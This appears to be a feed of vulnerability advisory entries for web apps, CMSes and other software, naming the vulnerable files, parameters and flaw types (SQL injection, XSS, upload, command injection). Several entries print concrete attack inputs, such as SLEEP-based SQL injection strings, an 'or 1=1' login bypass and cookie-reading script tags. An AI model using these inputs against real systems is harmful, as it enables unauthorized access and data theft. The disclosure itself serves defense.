A vulnerability classified as problematic has been found in SourceCodester Simple Task Allocation System 1.0. Affected is an unknown function of the file LoginRegistration.php?a=register_user. The manipulation of the argument Fullname leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-224244.
A vulnerability was found in SourceCodester Young Entrepreneur E-Negosyo System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file bsenordering/admin/category/index.php of the component GET Parameter Handler. The manipulation of the argument view with the input &lt;script&gt;alert(233)&lt;/script&gt; leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224243.
A vulnerability was found in HadSky up to 7.11.8. It has been declared as critical. This vulnerability affects unknown code of the file /install/index.php of the component Installation Interface. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-224242 is the identifier assigned to this vulnerability.
A vulnerability was found in HadSky 7.7.16. It has been classified as problematic. This affects an unknown part of the file upload/index.php?c=app&amp;a=superadmin:index. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224241 was assigned to this vulnerability.
A vulnerability was found in Xunrui CMS 4.61 and classified as problematic. Affected by this issue is some unknown functionality of the file /dayrui/Fcms/View/system_log.html. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224240.
A vulnerability has been found in Xunrui CMS 4.61 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /dayrui/My/Config/Install.txt. The manipulation leads to direct request. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224239.
A vulnerability, which was classified as problematic, was found in Xunrui CMS 4.61. Affected is an unknown function of the file /config/myfield/test.php. The manipulation leads to information disclosure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-224238 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Xunrui CMS 4.61. This issue affects some unknown processing of the file /dayrui/My/View/main.html. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224237 was assigned to this vulnerability.
A vulnerability was found in SourceCodester School Registration and Fee System 1.0. It has been classified as critical. Affected is an unknown function of the file /bilal final/edit_stud.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224232.
A vulnerability was found in SourceCodester School Registration and Fee System 1.0 and classified as critical. This issue affects some unknown processing of the file /bilal final/login.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224231.
A vulnerability has been found in SourceCodester Automatic Question Paper Generator System 1.0 and classified as critical. This vulnerability affects unknown code of the file users/classes/view_class.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224104.
A vulnerability classified as problematic has been found in Jianming Antivirus 16.2.2022.418. Affected is an unknown function in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. VDB-224010 is the identifier assigned to this vulnerability.
A vulnerability was found in Jianming Antivirus 16.2.2022.418. It has been rated as problematic. This issue affects some unknown processing in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier VDB-224009 was assigned to this vulnerability.
A vulnerability was found in Jianming Antivirus 16.2.2022.418. It has been declared as critical. This vulnerability affects unknown code in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to memory corruption. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224008.
A vulnerability was found in XiaoBingBy TeaCMS up to 2.0.2. It has been classified as problematic. Affected is an unknown function of the component Article Title Handler. The manipulation with the input &lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223800.
A vulnerability has been found in Rebuild up to 3.2.3 and classified as problematic. This vulnerability affects unknown code of the file /feeds/post/publish. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-223744.
A vulnerability, which was classified as critical, was found in Rebuild up to 3.2.3. This affects an unknown part of the file /files/list-file. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-223743.
A vulnerability, which was classified as critical, has been found in Rebuild up to 3.2.3. Affected by this issue is some unknown functionality of the file /project/tasks/list. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-223742 is the identifier assigned to this vulnerability.
A vulnerability was found in novel-plus 3.6.2. It has been classified as critical. This affects an unknown part of the file /common/sysFile/list. The manipulation of the argument sort leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223737 was assigned to this vulnerability.
A vulnerability was found in novel-plus 3.6.2 and classified as critical. Affected by this issue is some unknown functionality of the file DictController.java. The manipulation of the argument orderby leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223736.
A vulnerability has been found in novel-plus 3.6.2 and classified as critical. Affected by this vulnerability is an unknown functionality of the file common/log/list. The manipulation of the argument sort leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223663.
A vulnerability, which was classified as problematic, has been found in SourceCodester Automatic Question Paper Generator System 1.0. This issue affects some unknown processing of the file classes/Master.php?f=save_class. The manipulation of the argument description leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-223661 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Automatic Question Paper Generator System 1.0. This vulnerability affects unknown code of the file admin/courses/view_class.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The identifier of this vulnerability is VDB-223660.
A vulnerability classified as critical has been found in SourceCodester Automatic Question Paper Generator System 1.0. This affects an unknown part of the file classes/Users.php?f=save_ruser. The manipulation of the argument id/email leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-223659.
A vulnerability was found in DataGear up to 1.11.1 and classified as problematic. This issue affects some unknown processing of the component Graph Dataset Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.12.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-223565 was assigned to this vulnerability.
A vulnerability has been found in DataGear up to 1.11.1 and classified as problematic. This vulnerability affects unknown code of the component Plugin Handler. The manipulation leads to cross site scripting. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. Upgrading to version 1.12.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-223564.
A vulnerability, which was classified as critical, was found in DataGear up to 4.5.0. This affects an unknown part of the file /analysisProject/pagingQueryData. The manipulation of the argument queryOrder leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.5.1 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-223563.
A vulnerability classified as problematic was found in SourceCodester E-Commerce System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/user/controller.php?action=edit. The manipulation of the argument U_NAME with the input &lt;script&gt;alert('1')&lt;/script&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223561 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Student Study Center Desk Management System 1.0. Affected is an unknown function of the file /admin/reports/index.php of the component GET Parameter Handler. The manipulation of the argument date_to leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223560.
A vulnerability was found in SourceCodester Student Study Center Desk Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/assign/assign.php. The manipulation of the argument sid leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223559.
A vulnerability was found in SourceCodester Medical Certificate Generator App 1.0. It has been declared as critical. This vulnerability affects unknown code of the file action.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-223558 is the identifier assigned to this vulnerability.
A vulnerability was found in FeiFeiCMS 2.7.130201. It has been classified as problematic. This affects an unknown part of the file \Public\system\slide_add.html of the component Extension Tool. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223557 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Air Cargo Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file admin/transactions/update_status.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223556.
A vulnerability has been found in SourceCodester Student Study Center Desk Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/assign/assign.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223555.
A vulnerability, which was classified as critical, was found in code-projects Simple Online Hotel Reservation System 1.0. Affected is an unknown function of the file add_room.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. VDB-223554 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in TinyTIFF 3.0.0.0. This issue affects some unknown processing of the file tinytiffreader.c of the component File Handler. The manipulation leads to buffer overflow. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier VDB-223553 was assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Storage Unit Rental Management System 1.0. This vulnerability affects unknown code of the file classes/Users.php?f=save. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223552.
A vulnerability classified as critical has been found in Simple and Beautiful Shopping Cart System 1.0. This affects an unknown part of the file uploadera.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223551.
A vulnerability was found in SourceCodester E-Commerce System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /ecommerce/admin/user/controller.php?action=edit of the component Username Handler. The manipulation of the argument USERID leads to improper access controls. The attack may be launched remotely. VDB-223550 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Judging Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file summary_results.php. The manipulation of the argument main_event_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223549 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester E-Commerce System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /ecommerce/admin/category/controller.php of the component Category Name Handler. The manipulation of the argument CATEGORY leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223411.
A vulnerability, which was classified as critical, was found in SourceCodester E-Commerce System 1.0. Affected is an unknown function of the file login.php. The manipulation of the argument U_USERNAME leads to sql injection. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-223410 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester E-Commerce System 1.0. This issue affects some unknown processing of the file /ecommerce/admin/settings/setDiscount.php. The manipulation of the argument id with the input 201737 AND (SELECT 8973 FROM (SELECT(SLEEP(5)))OoAD) leads to sql injection. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-223409 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Alphaware Simple E-Commerce System 1.0. This vulnerability affects unknown code. The manipulation of the argument email/password with the input test1%40test.com ' AND (SELECT 6077 FROM (SELECT(SLEEP(5)))dltn) AND 'PhRa'='PhRa leads to sql injection. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223408.
A vulnerability classified as critical has been found in SourceCodester Alphaware Simple E-Commerce System 1.0. This affects an unknown part of the file admin/admin_index.php. The manipulation of the argument username/password with the input admin' AND (SELECT 8062 FROM (SELECT(SLEEP(5)))meUD)-- hLiX leads to sql injection. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223407.
A vulnerability was found in SourceCodester Alphaware Simple E-Commerce System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file function/edit_customer.php. The manipulation of the argument firstname/mi/lastname with the input a' RLIKE SLEEP(5) AND 'dAbu'='dAbu leads to sql injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-223406 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in code-projects Simple Art Gallery 1.0. Affected by this issue is some unknown functionality of the file adminHome.php. The manipulation of the argument about_info leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223400.
A vulnerability classified as critical was found in code-projects Simple Art Gallery 1.0. Affected by this vulnerability is an unknown functionality of the file adminHome.php. The manipulation of the argument reach_city leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223399.
A vulnerability classified as critical has been found in code-projects Responsive Hotel Site 1.0. Affected is an unknown function of the file messages.php of the component Newsletter Log Handler. The manipulation of the argument title leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-223398 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple and Nice Shopping Cart Script 1.0. It has been rated as critical. This issue affects some unknown processing of the file uploaderm.php. The manipulation of the argument submit leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223397 was assigned to this vulnerability.
A vulnerability classified as critical has been found in IBOS 4.5.5. Affected is an unknown function of the file ApiController.php. The manipulation of the argument emailids leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223380.
A vulnerability classified as problematic has been found in SourceCodester Young Entrepreneur E-Negosyo System 1.0. This affects an unknown part of the file /bsenordering/index.php of the component GET Parameter Handler. The manipulation of the argument category with the input &lt;script&gt;alert(222)&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223371.
A vulnerability was found in xzjie cms up to 1.0.3 and classified as critical. This issue affects some unknown processing of the file /api/upload. The manipulation of the argument uploadFile leads to unrestricted upload. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-223367.
A vulnerability has been found in XiaoBingBy TeaCMS up to 2.0.2 and classified as critical. This vulnerability affects unknown code of the file /admin/getallarticleinfo. The manipulation of the argument searchInfo leads to sql injection. The attack can be initiated remotely. VDB-223366 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in HkCms 2.2.4.230206. This affects an unknown part of the file /admin.php/appcenter/local.html?type=addon of the component External Plugin Handler. The manipulation leads to code injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223365 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in SourceCodester Monitoring of Students Cyber Accounts System 1.0. Affected by this issue is some unknown functionality of the file modules/balance/index.php?view=balancelist of the component POST Parameter Handler. The manipulation of the argument id with the input "&gt;&lt;script&gt;alert(111)&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223364.
A vulnerability classified as critical was found in SourceCodester Monitoring of Students Cyber Accounts System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php of the component POST Parameter Handler. The manipulation of the argument un leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223363.
A vulnerability classified as critical has been found in SourceCodester Simple Music Player 1.0. Affected is an unknown function of the file save_music.php. The manipulation of the argument filename leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-223362 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Automatic Question Paper Generator System 1.0. This vulnerability affects unknown code of the file users/question_papers/manage_question_paper.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223336.
A vulnerability classified as critical was found in SourceCodester Student Study Center Desk Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/?page=reports&amp;date_from=2023-02-17&amp;date_to=2023-03-17 of the component Report Handler. The manipulation of the argument date_from/date_to leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-223327.
A vulnerability classified as critical has been found in SourceCodester Student Study Center Desk Management System 1.0. Affected is an unknown function of the file Master.php?f=delete_img of the component POST Parameter Handler. The manipulation of the argument path with the input C%3A%2Ffoo.txt leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-223326 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Medicine Tracker System 1.0. This affects an unknown part of the file Users.php?f=save_user. The manipulation of the argument firstname/middlename/lastname/username/password leads to improper authentication. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-223311.
A vulnerability was found in SourceCodester Online Pizza Ordering System 1.0. It has been classified as critical. This affects an unknown part of the file admin/ajax.php?action=save_user of the component Password Change Handler. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The identifier VDB-223305 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Canteen Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file changeUsername.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223304.
** DISPUTED ** A vulnerability has been found in Ubiquiti EdgeRouter X 2.0.9-hotfix.6 and classified as critical. Affected by this vulnerability is an unknown functionality of the component OSPF Handler. The manipulation of the argument area leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The associated identifier of this vulnerability is VDB-223303. NOTE: The vendor position is that post-authentication issues are not accepted as vulnerabilities.
** DISPUTED ** A vulnerability, which was classified as critical, was found in Ubiquiti EdgeRouter X 2.0.9-hotfix.6. Affected is an unknown function of the component Static Routing Configuration Handler. The manipulation of the argument next-hop-interface leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. VDB-223302 is the identifier assigned to this vulnerability. NOTE: The vendor position is that post-authentication issues are not accepted as vulnerabilities.
** DISPUTED ** A vulnerability, which was classified as critical, has been found in Ubiquiti EdgeRouter X 2.0.9-hotfix.6. This issue affects some unknown processing of the component NAT Configuration Handler. The manipulation leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The identifier VDB-223301 was assigned to this vulnerability. NOTE: The vendor position is that post-authentication issues are not accepted as vulnerabilities.
A vulnerability classified as critical was found in SourceCodester Online Pizza Ordering System 1.0. This vulnerability affects unknown code of the file admin/ajax.php?action=login2 of the component Login Page. The manipulation of the argument email with the input abc%40qq.com' AND (SELECT 9110 FROM (SELECT(SLEEP(5)))XSlc) AND 'jFNl'='jFNl leads to sql injection. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223300.
A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223299.
A vulnerability was found in GPAC 2.3-DEV-rev35-gbbca86917-master. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file filters/load_text.c. The manipulation leads to buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier VDB-223297 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in SourceCodester Medicine Tracker System 1.0. Affected by this issue is some unknown functionality of the file app/?page=medicines/manage_medicine. The manipulation of the argument name/description with the input &lt;script&gt;alert('2')&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-223292.
A vulnerability was found in Meizhou Qingyunke QYKCMS 4.3.0. It has been classified as problematic. This affects an unknown part of the file /admin_system/api.php of the component Update Handler. The manipulation of the argument downurl leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223287.
A vulnerability has been found in SourceCodester Automatic Question Paper Generator System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file admin/courses/view_course.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223285 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Automatic Question Paper Generator System 1.0. Affected is an unknown function of the file users/user/manage_user.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223284.
A vulnerability, which was classified as critical, has been found in SourceCodester Medicine Tracker System 1.0. This issue affects some unknown processing of the file medicines/view_details.php of the component GET Parameter Handler. The manipulation of the argument GET leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223283.
A vulnerability was found in SourceCodester Gadget Works Online Ordering System 1.0. It has been classified as problematic. This affects an unknown part of the file admin/products/controller.php?action=add of the component Products Handler. The manipulation of the argument filename leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223215.
A vulnerability was found in SourceCodester Online Food Ordering System 2.0 and classified as critical. Affected by this issue is some unknown functionality of the file /fos/admin/ajax.php?action=save_settings of the component POST Request Handler. The manipulation leads to improper access controls. The attack may be launched remotely. VDB-223214 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Friendly Island Pizza Website and Ordering System 1.0. Affected by this vulnerability is an unknown functionality of the file cashconfirm.php of the component POST Parameter Handler. The manipulation of the argument transactioncode leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223129 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Simple Art Gallery 1.0. Affected is an unknown function of the file adminHome.php. The manipulation of the argument social_facebook leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223128.
A vulnerability classified as critical was found in SourceCodester Student Study Center Desk Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/user/manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223111.
A vulnerability classified as critical was found in XiaoBingBy TeaCMS 2.0. Affected by this vulnerability is an unknown functionality of the file /admin/upload. The manipulation leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222985 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Online Student Management System 1.0. Affected is an unknown function of the file profile.php. The manipulation of the argument adminname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222984.
A vulnerability was found in SourceCodester Online Tours &amp; Travels Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin/traveller_details.php. The manipulation of the argument address leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222983.
A vulnerability, which was classified as problematic, was found in SourceCodester Online Tours &amp; Travels Management System 1.0. Affected is an unknown function of the file admin/ab.php. The manipulation of the argument img leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-222978 is the identifier assigned to this vulnerability.
A remote denial of service vulnerability was found in the Linux kernel&amp;#8217;s TIPC kernel module. The while loop in tipc_link_xmit() hits an unknown state while attempting to parse SKBs, which are not in the queue. Sending two small UDP packets to a system with a UDP bearer results in the CPU utilization for the system to instantly spike to 100%, causing a denial of service condition.
A vulnerability was found in SourceCodester Friendly Island Pizza Website and Ordering System 1.0. It has been rated as critical. This issue affects some unknown processing of the file addmem.php of the component POST Parameter Handler. The manipulation of the argument firstname leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223127.
A vulnerability classified as critical was found in SourceCodester Friendly Island Pizza Website and Ordering System 1.0. This vulnerability affects unknown code of the file paypalsuccess.php of the component POST Parameter Handler. The manipulation of the argument cusid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222904.
A vulnerability was found in XHCMS 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php of the component POST Parameter Handler. The manipulation of the argument user leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222874 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/ajax.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222872.
A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file category.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222871.
A vulnerability, which was classified as problematic, was found in SourceCodester Computer Parts Sales and Inventory System 1.0. Affected is an unknown function of the component Add User Account. The manipulation of the argument username leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-222870 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Payslip Generator with Sending Mail 1.2.0 and classified as critical. This issue affects some unknown processing of the file classes/Users.php?f=save of the component New User Creation. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222863.
A vulnerability has been found in SourceCodester Gadget Works Online Ordering System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /philosophy/admin/user/controller.php?action=add of the component Add New User. The manipulation of the argument U_NAME leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222862 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Gadget Works Online Ordering System 1.0. This affects an unknown part of the file /philosophy/admin/login.php of the component POST Parameter Handler. The manipulation of the argument user_email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222861 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Simple Bakery Shop Management System 1.0. Affected by this issue is some unknown functionality of the component Admin Login. The manipulation of the argument username/password with the input admin' or 1=1 -- leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222860.
A vulnerability has been found in SourceCodester Design and Implementation of Covid-19 Directory on Vaccination System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file register.php. The manipulation of the argument txtfullname/txtage/txtaddress/txtphone leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222853 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Design and Implementation of Covid-19 Directory on Vaccination System 1.0. Affected is an unknown function of the file verification.php. The manipulation of the argument txtvaccinationID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222852.
A vulnerability, which was classified as critical, has been found in SourceCodester Design and Implementation of Covid-19 Directory on Vaccination System 1.0. This issue affects some unknown processing of the file /admin/login.php. The manipulation of the argument txtusername/txtpassword leads to sql injection. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222851.
A vulnerability classified as critical has been found in SourceCodester Computer Parts Sales and Inventory System 1.0. This affects an unknown part of the file cust_transac.php. The manipulation of the argument phonenumber leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222849 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Hsycms 3.1. Affected by this issue is some unknown functionality of the file controller\cate.php of the component Add Category Module. The manipulation of the argument title leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-222842 is the identifier assigned to this vulnerability.
A vulnerability was found in Guizhou 115cms 4.2. It has been classified as problematic. Affected is an unknown function of the file /admin/content/index. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-222738 is the identifier assigned to this vulnerability.
